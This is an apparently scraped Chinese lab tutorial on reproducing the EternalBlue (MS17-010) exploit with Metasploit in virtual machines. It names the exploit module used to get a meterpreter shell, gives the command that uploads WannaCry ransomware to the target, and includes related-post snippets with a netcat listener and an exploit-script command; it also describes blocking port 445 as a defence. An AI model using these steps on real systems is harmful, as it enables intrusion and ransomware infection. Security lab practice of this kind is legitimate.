永恆之藍ms17 010復現

2021-10-20 12:40:58 字數 2100 閱讀 1862

使用工具:metasploit

一、環境準備

kali虛擬機器

二、metasploit簡介

metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和it專業人士識別安全性問題,驗證漏洞的緩解措施,並管理專家驅動的安全性進行評估,提供真正的安全風險情報。這些功能包括智慧型開發、**審計、web應用程式掃瞄、社會工程等。

metasploit框架(metasploit framework,msf)是乙個開源工具,旨在方便滲透測試,它是由ruby程式語言編寫的模板化框架,具有很好的擴充套件性,便於滲透測試人員開發、使用定製的工具模板。metasploit已成為當前資訊保安與滲透測試領域最流行的術語。

metasploit可向後端模組提供多種用來控制測試的介面,如控制台、web、cli。推薦使用控制台介面,通過控制台介面可以訪問和使用所有metasploit的外掛程式,如payload、利用模組、post模組等。metasploit還有第三方程式的介面,比如nmap、sqlmap等,可以直接在控制台介面使用。

2.1啟動metasploit

啟動後介面如下

2.2 使用portscan檢視目標主機開放的埠

tcp掃瞄

2.3 檢視是否存在ms17-010

host is likely vulnerable to ms17-010! 說明可能存在該漏洞

2.4 漏洞利用

使用 exploit(windows/smb/ms17_010_eternalblue) 拿到 meterpreter

meterpreter是metasploit的預設windows系統下的shell code

返回系統管理員許可權

在目標主機上建立檔案

上傳wannacry。

upload /root/wcry.exe c:

沒有找到樣本,以下截圖使用的楊秀章老師的

執行病毒程式後的介面如下圖所示,已經成功被勒索。再次強調,所有**必須在虛擬機器中執行,並且關閉檔案共享。

三、防禦措施

至此,我們已經成功利用了ms17-010漏洞實現入侵,其防禦常見的措施如下:

由於wannacry等勒索病毒主要通過445埠入侵計算機,關閉的方法如下:

控制面板–>windows防火牆—>高階選項–>入站規則

新建規則–>選擇埠–>指定埠號445

選擇阻止連線–>配置檔案全選–>規則名稱–>成功關閉

MS17 010(永恆之藍)漏洞復現

永恆之藍是2017年4月14日晚,黑客團體shadow brokers 影子經紀人 公布的一大批網路攻擊工具中的其中乙個。永恆之藍 利用windows系統的smb漏洞可以獲取系統最高許可權。5月12日,不法分子通過改造 永恆之藍 製作了wannacry勒索病毒。實驗一 獲取windows serve...

ms17 010漏洞復現

很老的洞了,只是老師上課講了,我就復現一遍。環境靶機為windows7並且存在此漏洞 攻擊機需要python3環境 nc lvp 8888 python ms17 010.py host 192.168.217.2 file shellcode 只需這兩條命令,便可以利用成功,其中ms17 010....

MS17 010漏洞復現

實驗環境 kali 虛擬機器 windows 7 x64 虛擬機器 1 檢視兩台機器的ip位址,且關閉win7防火牆 可見win7 ip為 192.168.15.129 kali 為 192.168.15.130 啟動 mdfconsole msfconsole 使用如下命令 第一句為利用auxil...